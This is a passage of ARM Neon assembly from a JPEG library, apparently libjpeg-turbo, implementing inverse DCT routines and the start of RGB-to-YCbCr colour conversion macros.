ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 7 * 8))]
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7L, XFIX_0_298631336_MINUS_0_899976223
orr r0, r0, r4
vadd.s32 q2, q5, q6
orrs r0, r0, r5
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
ldrd r4, [COEF_BLOCK, #(-96 + 2 * (4 + 0 * 8))]
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
orr r0, r4, r5
vsub.s32 q3, q1, q4
pop {r4, r5}
vrshrn.s32 ROW7L, q2, #11
vrshrn.s32 ROW3L, q5, #11
vrshrn.s32 ROW0L, q6, #11
vrshrn.s32 ROW4L, q3, #11
beq 3f /* Go to do some special handling for the sparse
right 4x8 half */
/* 1-D IDCT, pass 1, right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vadd.s16 d10, ROW7R, ROW3R
vadd.s16 d8, ROW5R, ROW1R
/* Transpose left 4x8 half */
vtrn.16 ROW6L, ROW7L
vmull.s16 q6, d10, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, d8, XFIX_1_175875602
vtrn.16 ROW2L, ROW3L
vmull.s16 q7, d10, XFIX_1_175875602
vmlal.s16 q7, d8, XFIX_1_175875602_MINUS_0_390180644
vtrn.16 ROW0L, ROW1L
vsubl.s16 q3, ROW0R, ROW4R
vmull.s16 q2, ROW2R, XFIX_0_541196100
vmlal.s16 q2, ROW6R, XFIX_0_541196100_MINUS_1_847759065
vtrn.16 ROW4L, ROW5L
vmov q4, q6
vmlsl.s16 q6, ROW5R, XFIX_2_562915447
vmlal.s16 q6, ROW3R, XFIX_3_072711026_MINUS_2_562915447
vtrn.32 ROW1L, ROW3L
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW1R, XFIX_0_899976223
vtrn.32 ROW4L, ROW6L
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vtrn.32 ROW0L, ROW2L
vmlsl.s16 q7, ROW7R, XFIX_0_899976223
vmlal.s16 q7, ROW1R, XFIX_1_501321110_MINUS_0_899976223
vrshrn.s32 ROW1R, q1, #11
vtrn.32 ROW5L, ROW7L
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5R, XFIX_2_053119869_MINUS_2_562915447
vmlsl.s16 q5, ROW3R, XFIX_2_562915447
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2R, XFIX_0_541196100_PLUS_0_765366865
vmlal.s16 q6, ROW6R, XFIX_0_541196100
vsub.s32 q3, q3, q2
vrshrn.s32 ROW6R, q1, #11
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0R, ROW4R
vrshrn.s32 ROW2R, q1, #11
vrshrn.s32 ROW5R, q3, #11
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7R, XFIX_0_298631336_MINUS_0_899976223
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vrshrn.s32 ROW7R, q2, #11
vrshrn.s32 ROW3R, q5, #11
vrshrn.s32 ROW0R, q6, #11
vrshrn.s32 ROW4R, q3, #11
/* Transpose right 4x8 half */
vtrn.16 ROW6R, ROW7R
vtrn.16 ROW2R, ROW3R
vtrn.16 ROW0R, ROW1R
vtrn.16 ROW4R, ROW5R
vtrn.32 ROW1R, ROW3R
vtrn.32 ROW4R, ROW6R
vtrn.32 ROW0R, ROW2R
vtrn.32 ROW5R, ROW7R
1: /* 1-D IDCT, pass 2 (normal variant), left 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW1R, XFIX_1_175875602 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW1L, XFIX_1_175875602
vmlal.s16 q6, ROW3R, XFIX_1_175875602_MINUS_1_961570560 /* ROW7L <-> ROW3R */
vmlal.s16 q6, ROW3L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW3R, XFIX_1_175875602 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW3L, XFIX_1_175875602
vmlal.s16 q7, ROW1R, XFIX_1_175875602_MINUS_0_390180644 /* ROW5L <-> ROW1R */
vmlal.s16 q7, ROW1L, XFIX_1_175875602_MINUS_0_390180644
vsubl.s16 q3, ROW0L, ROW0R /* ROW4L <-> ROW0R */
vmull.s16 q2, ROW2L, XFIX_0_541196100
vmlal.s16 q2, ROW2R, XFIX_0_541196100_MINUS_1_847759065 /* ROW6L <-> ROW2R */
vmov q4, q6
vmlsl.s16 q6, ROW1R, XFIX_2_562915447 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vmlsl.s16 q7, ROW3R, XFIX_0_899976223 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vshrn.s32 ROW1L, q1, #16
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW1R, XFIX_2_053119869_MINUS_2_562915447 /* ROW5L <-> ROW1R */
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
vmlal.s16 q6, ROW2R, XFIX_0_541196100 /* ROW6L <-> ROW2R */
vsub.s32 q3, q3, q2
vshrn.s32 ROW2R, q1, #16 /* ROW6L <-> ROW2R */
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW0L, ROW0R /* ROW4L <-> ROW0R */
vshrn.s32 ROW2L, q1, #16
vshrn.s32 ROW1R, q3, #16 /* ROW5L <-> ROW1R */
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW3R, XFIX_0_298631336_MINUS_0_899976223 /* ROW7L <-> ROW3R */
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW3R, q2, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW3L, q5, #16
vshrn.s32 ROW0L, q6, #16
vshrn.s32 ROW0R, q3, #16 /* ROW4L <-> ROW0R */
/* 1-D IDCT, pass 2, right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW5R, XFIX_1_175875602
vmlal.s16 q6, ROW5L, XFIX_1_175875602 /* ROW5L <-> ROW1R */
vmlal.s16 q6, ROW7R, XFIX_1_175875602_MINUS_1_961570560
vmlal.s16 q6, ROW7L, XFIX_1_175875602_MINUS_1_961570560 /* ROW7L <-> ROW3R */
vmull.s16 q7, ROW7R, XFIX_1_175875602
vmlal.s16 q7, ROW7L, XFIX_1_175875602 /* ROW7L <-> ROW3R */
vmlal.s16 q7, ROW5R, XFIX_1_175875602_MINUS_0_390180644
vmlal.s16 q7, ROW5L, XFIX_1_175875602_MINUS_0_390180644 /* ROW5L <-> ROW1R */
vsubl.s16 q3, ROW4L, ROW4R /* ROW4L <-> ROW0R */
vmull.s16 q2, ROW6L, XFIX_0_541196100 /* ROW6L <-> ROW2R */
vmlal.s16 q2, ROW6R, XFIX_0_541196100_MINUS_1_847759065
vmov q4, q6
vmlsl.s16 q6, ROW5R, XFIX_2_562915447
vmlal.s16 q6, ROW7L, XFIX_3_072711026_MINUS_2_562915447 /* ROW7L <-> ROW3R */
vshl.s32 q3, q3, #13
vmlsl.s16 q4, ROW5L, XFIX_0_899976223 /* ROW5L <-> ROW1R */
vadd.s32 q1, q3, q2
vmov q5, q7
vadd.s32 q1, q1, q6
vmlsl.s16 q7, ROW7R, XFIX_0_899976223
vmlal.s16 q7, ROW5L, XFIX_1_501321110_MINUS_0_899976223 /* ROW5L <-> ROW1R */
vshrn.s32 ROW5L, q1, #16 /* ROW5L <-> ROW1R */
vsub.s32 q1, q1, q6
vmlal.s16 q5, ROW5R, XFIX_2_053119869_MINUS_2_562915447
vmlsl.s16 q5, ROW7L, XFIX_2_562915447 /* ROW7L <-> ROW3R */
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW6L, XFIX_0_541196100_PLUS_0_765366865 /* ROW6L <-> ROW2R */
vmlal.s16 q6, ROW6R, XFIX_0_541196100
vsub.s32 q3, q3, q2
vshrn.s32 ROW6R, q1, #16
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vaddl.s16 q5, ROW4L, ROW4R /* ROW4L <-> ROW0R */
vshrn.s32 ROW6L, q1, #16 /* ROW6L <-> ROW2R */
vshrn.s32 ROW5R, q3, #16
vshl.s32 q5, q5, #13
vmlal.s16 q4, ROW7R, XFIX_0_298631336_MINUS_0_899976223
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW7R, q2, #16
vshrn.s32 ROW7L, q5, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW4L, q6, #16 /* ROW4L <-> ROW0R */
vshrn.s32 ROW4R, q3, #16
2: /* Descale to 8-bit and range limit */
vqrshrn.s16 d16, q8, #2
vqrshrn.s16 d17, q9, #2
vqrshrn.s16 d18, q10, #2
vqrshrn.s16 d19, q11, #2
vpop {d8 - d15} /* restore Neon registers */
vqrshrn.s16 d20, q12, #2
/* Transpose the final 8-bit samples and do signed->unsigned conversion */
vtrn.16 q8, q9
vqrshrn.s16 d21, q13, #2
vqrshrn.s16 d22, q14, #2
vmov.u8 q0, #(CENTERJSAMPLE)
vqrshrn.s16 d23, q15, #2
vtrn.8 d16, d17
vtrn.8 d18, d19
vadd.u8 q8, q8, q0
vadd.u8 q9, q9, q0
vtrn.16 q10, q11
/* Store results to the output buffer */
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d16}, [TMP1]
vtrn.8 d20, d21
vst1.8 {d17}, [TMP2]
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d18}, [TMP1]
vadd.u8 q10, q10, q0
vst1.8 {d19}, [TMP2]
ldmia OUTPUT_BUF, {TMP1, TMP2, TMP3, TMP4}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
add TMP3, TMP3, OUTPUT_COL
add TMP4, TMP4, OUTPUT_COL
vtrn.8 d22, d23
vst1.8 {d20}, [TMP1]
vadd.u8 q11, q11, q0
vst1.8 {d21}, [TMP2]
vst1.8 {d22}, [TMP3]
vst1.8 {d23}, [TMP4]
bx lr
3: /* Left 4x8 half is done, right 4x8 half contains mostly zeros */
/* Transpose left 4x8 half */
vtrn.16 ROW6L, ROW7L
vtrn.16 ROW2L, ROW3L
vtrn.16 ROW0L, ROW1L
vtrn.16 ROW4L, ROW5L
vshl.s16 ROW0R, ROW0R, #2 /* PASS1_BITS */
vtrn.32 ROW1L, ROW3L
vtrn.32 ROW4L, ROW6L
vtrn.32 ROW0L, ROW2L
vtrn.32 ROW5L, ROW7L
cmp r0, #0
beq 4f /* Right 4x8 half has all zeros, go to 'sparse' second
pass */
/* Only row 0 is non-zero for the right 4x8 half */
vdup.s16 ROW1R, ROW0R[1]
vdup.s16 ROW2R, ROW0R[2]
vdup.s16 ROW3R, ROW0R[3]
vdup.s16 ROW4R, ROW0R[0]
vdup.s16 ROW5R, ROW0R[1]
vdup.s16 ROW6R, ROW0R[2]
vdup.s16 ROW7R, ROW0R[3]
vdup.s16 ROW0R, ROW0R[0]
b 1b /* Go to 'normal' second pass */
4: /* 1-D IDCT, pass 2 (sparse variant with zero rows 4-7), left 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW1L, XFIX_1_175875602
vmlal.s16 q6, ROW3L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW3L, XFIX_1_175875602
vmlal.s16 q7, ROW1L, XFIX_1_175875602_MINUS_0_390180644
vmull.s16 q2, ROW2L, XFIX_0_541196100
vshll.s16 q3, ROW0L, #13
vmov q4, q6
vmlal.s16 q6, ROW3L, XFIX_3_072711026_MINUS_2_562915447
vmlsl.s16 q4, ROW1L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vmlal.s16 q7, ROW1L, XFIX_1_501321110_MINUS_0_899976223
vadd.s32 q1, q1, q6
vadd.s32 q6, q6, q6
vmlsl.s16 q5, ROW3L, XFIX_2_562915447
vshrn.s32 ROW1L, q1, #16
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW2L, XFIX_0_541196100_PLUS_0_765366865
vsub.s32 q3, q3, q2
vshrn.s32 ROW2R, q1, #16 /* ROW6L <-> ROW2R */
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vshll.s16 q5, ROW0L, #13
vshrn.s32 ROW2L, q1, #16
vshrn.s32 ROW1R, q3, #16 /* ROW5L <-> ROW1R */
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW3R, q2, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW3L, q5, #16
vshrn.s32 ROW0L, q6, #16
vshrn.s32 ROW0R, q3, #16 /* ROW4L <-> ROW0R */
/* 1-D IDCT, pass 2 (sparse variant with zero rows 4-7), right 4x8 half */
vld1.s16 {d2}, [ip, :64] /* reload constants */
vmull.s16 q6, ROW5L, XFIX_1_175875602
vmlal.s16 q6, ROW7L, XFIX_1_175875602_MINUS_1_961570560
vmull.s16 q7, ROW7L, XFIX_1_175875602
vmlal.s16 q7, ROW5L, XFIX_1_175875602_MINUS_0_390180644
vmull.s16 q2, ROW6L, XFIX_0_541196100
vshll.s16 q3, ROW4L, #13
vmov q4, q6
vmlal.s16 q6, ROW7L, XFIX_3_072711026_MINUS_2_562915447
vmlsl.s16 q4, ROW5L, XFIX_0_899976223
vadd.s32 q1, q3, q2
vmov q5, q7
vmlal.s16 q7, ROW5L, XFIX_1_501321110_MINUS_0_899976223
vadd.s32 q1, q1, q6
vadd.s32 q6, q6, q6
vmlsl.s16 q5, ROW7L, XFIX_2_562915447
vshrn.s32 ROW5L, q1, #16 /* ROW5L <-> ROW1R */
vsub.s32 q1, q1, q6
vmull.s16 q6, ROW6L, XFIX_0_541196100_PLUS_0_765366865
vsub.s32 q3, q3, q2
vshrn.s32 ROW6R, q1, #16
vadd.s32 q1, q3, q5
vsub.s32 q3, q3, q5
vshll.s16 q5, ROW4L, #13
vshrn.s32 ROW6L, q1, #16 /* ROW6L <-> ROW2R */
vshrn.s32 ROW5R, q3, #16
vadd.s32 q2, q5, q6
vsub.s32 q1, q5, q6
vadd.s32 q6, q2, q7
vsub.s32 q2, q2, q7
vadd.s32 q5, q1, q4
vsub.s32 q3, q1, q4
vshrn.s32 ROW7R, q2, #16
vshrn.s32 ROW7L, q5, #16 /* ROW7L <-> ROW3R */
vshrn.s32 ROW4L, q6, #16 /* ROW4L <-> ROW0R */
vshrn.s32 ROW4R, q3, #16
b 2b /* Go to epilogue */
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
.unreq ROW0L
.unreq ROW0R
.unreq ROW1L
.unreq ROW1R
.unreq ROW2L
.unreq ROW2R
.unreq ROW3L
.unreq ROW3R
.unreq ROW4L
.unreq ROW4R
.unreq ROW5L
.unreq ROW5R
.unreq ROW6L
.unreq ROW6R
.unreq ROW7L
.unreq ROW7R
/*****************************************************************************/
/*
* jsimd_idct_ifast_neon
*
* This function contains a fast, not so accurate integer implementation of
* the inverse DCT (Discrete Cosine Transform). It uses the same calculations
* and produces exactly the same output as IJG's original 'jpeg_idct_ifast'
* function from jidctfst.c
*
* Normally 1-D AAN DCT needs 5 multiplications and 29 additions.
* But in Arm Neon case some extra additions are required because VQDMULH
* instruction can't handle the constants larger than 1. So the expressions
* like "x * 1.082392200" have to be converted to "x * 0.082392200 + x",
* which introduces an extra addition. Overall, there are 6 extra additions
* per 1-D IDCT pass, totalling to 5 VQDMULH and 35 VADD/VSUB instructions.
*/
#define XFIX_1_082392200 d0[0]
#define XFIX_1_414213562 d0[1]
#define XFIX_1_847759065 d0[2]
#define XFIX_2_613125930 d0[3]
.balign 16
jsimd_idct_ifast_neon_consts:
.short (277 * 128 - 256 * 128) /* XFIX_1_082392200 */
.short (362 * 128 - 256 * 128) /* XFIX_1_414213562 */
.short (473 * 128 - 256 * 128) /* XFIX_1_847759065 */
.short (669 * 128 - 512 * 128) /* XFIX_2_613125930 */
asm_function jsimd_idct_ifast_neon
DCT_TABLE .req r0
COEF_BLOCK .req r1
OUTPUT_BUF .req r2
OUTPUT_COL .req r3
TMP1 .req r0
TMP2 .req r1
TMP3 .req r2
TMP4 .req ip
/* Load and dequantize coefficients into Neon registers
* with the following allocation:
* 0 1 2 3 | 4 5 6 7
* ---------+--------
* 0 | d16 | d17 ( q8 )
* 1 | d18 | d19 ( q9 )
* 2 | d20 | d21 ( q10 )
* 3 | d22 | d23 ( q11 )
* 4 | d24 | d25 ( q12 )
* 5 | d26 | d27 ( q13 )
* 6 | d28 | d29 ( q14 )
* 7 | d30 | d31 ( q15 )
*/
adr ip, jsimd_idct_ifast_neon_consts
vld1.16 {d16, d17, d18, d19}, [COEF_BLOCK, :128]!
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vld1.16 {d20, d21, d22, d23}, [COEF_BLOCK, :128]!
vmul.s16 q8, q8, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q9, q9, q1
vld1.16 {d24, d25, d26, d27}, [COEF_BLOCK, :128]!
vmul.s16 q10, q10, q2
vld1.16 {d0, d1, d2, d3}, [DCT_TABLE, :128]!
vmul.s16 q11, q11, q3
vld1.16 {d28, d29, d30, d31}, [COEF_BLOCK, :128]
vmul.s16 q12, q12, q0
vld1.16 {d4, d5, d6, d7}, [DCT_TABLE, :128]!
vmul.s16 q14, q14, q2
vmul.s16 q13, q13, q1
vld1.16 {d0}, [ip, :64] /* load constants */
vmul.s16 q15, q15, q3
vpush {d8 - d13} /* save Neon registers */
/* 1-D IDCT, pass 1 */
vsub.s16 q2, q10, q14
vadd.s16 q14, q10, q14
vsub.s16 q1, q11, q13
vadd.s16 q13, q11, q13
vsub.s16 q5, q9, q15
vadd.s16 q15, q9, q15
vqdmulh.s16 q4, q2, XFIX_1_414213562
vqdmulh.s16 q6, q1, XFIX_2_613125930
vadd.s16 q3, q1, q1
vsub.s16 q1, q5, q1
vadd.s16 q10, q2, q4
vqdmulh.s16 q4, q1, XFIX_1_847759065
vsub.s16 q2, q15, q13
vadd.s16 q3, q3, q6
vqdmulh.s16 q6, q2, XFIX_1_414213562
vadd.s16 q1, q1, q4
vqdmulh.s16 q4, q5, XFIX_1_082392200
vsub.s16 q10, q10, q14
vadd.s16 q2, q2, q6
vsub.s16 q6, q8, q12
vadd.s16 q12, q8, q12
vadd.s16 q9, q5, q4
vadd.s16 q5, q6, q10
vsub.s16 q10, q6, q10
vadd.s16 q6, q15, q13
vadd.s16 q8, q12, q14
vsub.s16 q3, q6, q3
vsub.s16 q12, q12, q14
vsub.s16 q3, q3, q1
vsub.s16 q1, q9, q1
vadd.s16 q2, q3, q2
vsub.s16 q15, q8, q6
vadd.s16 q1, q1, q2
vadd.s16 q8, q8, q6
vadd.s16 q14, q5, q3
vsub.s16 q9, q5, q3
vsub.s16 q13, q10, q2
vadd.s16 q10, q10, q2
/* Transpose */
vtrn.16 q8, q9
vsub.s16 q11, q12, q1
vtrn.16 q14, q15
vadd.s16 q12, q12, q1
vtrn.16 q10, q11
vtrn.16 q12, q13
vtrn.32 q9, q11
vtrn.32 q12, q14
vtrn.32 q8, q10
vtrn.32 q13, q15
vswp d28, d21
vswp d26, d19
/* 1-D IDCT, pass 2 */
vsub.s16 q2, q10, q14
vswp d30, d23
vadd.s16 q14, q10, q14
vswp d24, d17
vsub.s16 q1, q11, q13
vadd.s16 q13, q11, q13
vsub.s16 q5, q9, q15
vadd.s16 q15, q9, q15
vqdmulh.s16 q4, q2, XFIX_1_414213562
vqdmulh.s16 q6, q1, XFIX_2_613125930
vadd.s16 q3, q1, q1
vsub.s16 q1, q5, q1
vadd.s16 q10, q2, q4
vqdmulh.s16 q4, q1, XFIX_1_847759065
vsub.s16 q2, q15, q13
vadd.s16 q3, q3, q6
vqdmulh.s16 q6, q2, XFIX_1_414213562
vadd.s16 q1, q1, q4
vqdmulh.s16 q4, q5, XFIX_1_082392200
vsub.s16 q10, q10, q14
vadd.s16 q2, q2, q6
vsub.s16 q6, q8, q12
vadd.s16 q12, q8, q12
vadd.s16 q9, q5, q4
vadd.s16 q5, q6, q10
vsub.s16 q10, q6, q10
vadd.s16 q6, q15, q13
vadd.s16 q8, q12, q14
vsub.s16 q3, q6, q3
vsub.s16 q12, q12, q14
vsub.s16 q3, q3, q1
vsub.s16 q1, q9, q1
vadd.s16 q2, q3, q2
vsub.s16 q15, q8, q6
vadd.s16 q1, q1, q2
vadd.s16 q8, q8, q6
vadd.s16 q14, q5, q3
vsub.s16 q9, q5, q3
vsub.s16 q13, q10, q2
vpop {d8 - d13} /* restore Neon registers */
vadd.s16 q10, q10, q2
vsub.s16 q11, q12, q1
vadd.s16 q12, q12, q1
/* Descale to 8-bit and range limit */
vmov.u8 q0, #0x80
vqshrn.s16 d16, q8, #5
vqshrn.s16 d17, q9, #5
vqshrn.s16 d18, q10, #5
vqshrn.s16 d19, q11, #5
vqshrn.s16 d20, q12, #5
vqshrn.s16 d21, q13, #5
vqshrn.s16 d22, q14, #5
vqshrn.s16 d23, q15, #5
vadd.u8 q8, q8, q0
vadd.u8 q9, q9, q0
vadd.u8 q10, q10, q0
vadd.u8 q11, q11, q0
/* Transpose the final 8-bit samples */
vtrn.16 q8, q9
vtrn.16 q10, q11
vtrn.32 q8, q10
vtrn.32 q9, q11
vtrn.8 d16, d17
vtrn.8 d18, d19
/* Store results to the output buffer */
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d16}, [TMP1]
vst1.8 {d17}, [TMP2]
ldmia OUTPUT_BUF!, {TMP1, TMP2}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
vst1.8 {d18}, [TMP1]
vtrn.8 d20, d21
vst1.8 {d19}, [TMP2]
ldmia OUTPUT_BUF, {TMP1, TMP2, TMP3, TMP4}
add TMP1, TMP1, OUTPUT_COL
add TMP2, TMP2, OUTPUT_COL
add TMP3, TMP3, OUTPUT_COL
add TMP4, TMP4, OUTPUT_COL
vst1.8 {d20}, [TMP1]
vtrn.8 d22, d23
vst1.8 {d21}, [TMP2]
vst1.8 {d22}, [TMP3]
vst1.8 {d23}, [TMP4]
bx lr
.unreq DCT_TABLE
.unreq COEF_BLOCK
.unreq OUTPUT_BUF
.unreq OUTPUT_COL
.unreq TMP1
.unreq TMP2
.unreq TMP3
.unreq TMP4
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_neon
* jsimd_extbgr_ycc_convert_neon
* jsimd_extrgbx_ycc_convert_neon
* jsimd_extbgrx_ycc_convert_neon
* jsimd_extxbgr_ycc_convert_neon
* jsimd_extxrgb_ycc_convert_neon
*
* Colorspace conversion RGB -> YCbCr
*/
.macro do_store size
.if \size == 8
vst1.8 {d20}, [Y]!
vst1.8 {d21}, [U]!
vst1.8 {d22}, [V]!
.elseif \size == 4
vst1.8 {d20[0]}, [Y]!
vst1.8 {d20[1]}, [Y]!
vst1.8 {d20[2]}, [Y]!
vst1.8 {d20[3]}, [Y]!
vst1.8 {d21[0]}, [U]!
vst1.8 {d21[1]}, [U]!
vst1.8 {d21[2]}, [U]!
vst1.8 {d21[3]}, [U]!
vst1.8 {d22[0]}, [V]!
vst1.8 {d22[1]}, [V]!
vst1.8 {d22[2]}, [V]!
vst1.8 {d22[3]}, [V]!
.elseif \size == 2
vst1.8 {d20[4]}, [Y]!
vst1.8 {d20[5]}, [Y]!
vst1.8 {d21[4]}, [U]!
vst1.8 {d21[5]}, [U]!
vst1.8 {d22[4]}, [V]!
vst1.8 {d22[5]}, [V]!
.elseif \size == 1
vst1.8 {d20[6]}, [Y]!
vst1.8 {d21[6]}, [U]!
vst1.8 {d22[6]}, [V]!
.else
.error unsupported macroblock size
.endif
.endm
.macro do_load bpp, size
.if \bpp == 24
.if \size == 8
vld3.8 {d10, d11, d12}, [RGB]!
pld [RGB, #128]
.elseif \size == 4
vld3.8 {d10[0], d11[0], d12[0]}, [RGB]!
vld3.8 {d10[1], d11[1], d12[1]}, [RGB]!
vld3.8 {d10[2], d11[2], d12[2]}, [RGB]!
vld3.8 {d10[3], d11[3], d12[3]}, [RGB]!
.elseif \size == 2
vld3.8 {d10[4], d11[4], d12[4]}, [RGB]!
vld3.8 {d10[5], d11[5], d12[5]}, [RGB]!
.elseif \size == 1
vld3.8 {d10[6], d11[6], d12[6]}, [RGB]!
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
vld4.8 {d10, d11, d12, d13}, [RGB]!
pld [RGB, #128]
.elseif \size == 4
vld4.8 {d10[0], d11[0], d12[0], d13[0]}, [RGB]!
vld4.8 {d10[1], d11[1], d12[1], d13[1]}, [RGB]!
vld4.8 {d10[2], d11[2], d12[2], d13[2]}, [RGB]!
vld4.8 {d10[3], d11[3], d12[3], d13[3]}, [RGB]!
.elseif \size == 2
vld4.8 {d10[4], d11[4], d12[4], d13[4]}, [RGB]!
vld4.8 {d10[5], d11[5], d12[5], d13[5]}, [RGB]!
.elseif \size == 1
vld4.8 {d10[6], d11[6], d12[6], d13[6]}, [RGB]!
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
.macro generate_jsimd_rgb_ycc_convert_neon colorid, bpp, r_offs, g_offs, b_offs
/*
* 2-stage pipelined RGB->YCbCr conversion
*/
.macro do_rgb_to_yuv_stage1
vmovl.u8 q2, d1\r_offs /* r = { d4, d5 } */
vmovl.u8 q3, d1\g_offs /* g = { d6, d7 } */
vmovl.u8 q4, d1\b_offs /* b = { d8, d9 } */
vmull.u16 q7, d4, d0[0]
vmlal.u16 q7, d6, d0[1]
vmlal.u16 q7, d8, d0[2]
vmull.u16 q8, d5, d0[0]
vmlal.u16 q8, d7, d0[1]
vmlal.u16 q8, d9, d0[2]
vrev64.32 q9, q1
vrev64.32 q13, q1
vmlsl.u16 q9, d4, d0[3]
vmlsl.u16 q9, d6, d1[0]
vmlal.u16 q9, d8, d1[1]
vmlsl.u16 q13, d5, d0[3]
vmlsl.u16 q13, d7, d1[0]
vmlal.u16 q13, d9, d1[1]
vrev64.32 q14, q1
vrev64.32 q15, q1
vmlal.u16 q14, d4, d1[1]
vmlsl.u16 q14, d6, d1[2]
vmlsl.u16 q14, d8, d1[3]
vmlal.u16 q15, d5, d1[1]
vmlsl.u16 q15, d7, d1[2]
vmlsl.u16 q15, d9, d1[3]
.endm
.macro do_rgb_to_yuv_stage2
vrshrn.u32 d20, q7, #16
vrshrn.u32 d21, q8, #16
vshrn.u32 d22, q9, #16
vshrn.u32 d23, q13, #16
vshrn.u32 d24, q14, #16
vshrn.u32 d25, q15, #16
vmovn.u16 d20, q10 /* d20 = y */
vmovn.u16 d21, q11 /* d21 = u */
vmovn.u16 d22, q12 /* d22 = v */
.endm
.macro do_rgb_to_yuv
do_rgb_to_yuv_stage1
do_rgb_to_yuv_stage2
.endm
.macro do_rgb_to_yuv_stage2_store_load_stage1
vrshrn.u32 d20, q7, #16
vrshrn.u32 d21, q8, #16
vshrn.u32 d22, q9, #16
vrev64.32 q9, q1
vshrn.u32 d23, q13, #16
vrev64.32 q13, q1
vshrn.u32 d24, q14, #16
vshrn.u32 d25, q15, #16
do_load \bpp, 8
vmovn.u16 d20, q10 /* d20 = y */
vmovl.u8 q2, d1\r_offs /* r = { d4, d5 } */
vmovn.u16 d21, q11 /* d21 = u */
vmovl.u8 q3, d1\g_offs /* g = { d6, d7 } */
vmovn.u16 d22, q12 /* d22 = v */
vmovl.u8 q4, d1\b_offs /* b = { d8, d9 } */
vmull.u16 q7, d4, d0[0]
vmlal.u16 q7, d6, d0[1]
vmlal.u16 q7, d8, d0[2]
vst1.8 {d20}, [Y]!
vmull.u16 q8, d5, d0[0]
vmlal.u16 q8, d7, d0[1]
vmlal.u16 q8, d9, d0[2]
vmlsl.u16 q9, d4, d0[3]
vmlsl.u16 q9, d6, d1[0]
vmlal.u16 q9, d8, d1[1]
vst1.8 {d21}, [U]!
vmlsl.u16 q13, d5, d0[3]
vmlsl.u16 q13, d7, d1[0]
vmlal.u16 q13, d9, d1[1]
vrev64.32 q14, q1
vrev64.32 q15, q1
vmlal.u16 q14, d4, d1[1]
vmlsl.u16 q14, d6, d1[2]
vmlsl.u16 q14, d8, d1[3]
vst1.8 {d22}, [V]!
vmlal.u16 q15, d5, d1[1]
vmlsl.u16 q15, d7, d1[2]
vmlsl.u16 q15, d9, d1[3]
.endm
.balign 16
jsimd_\colorid\()_ycc_neon_consts:
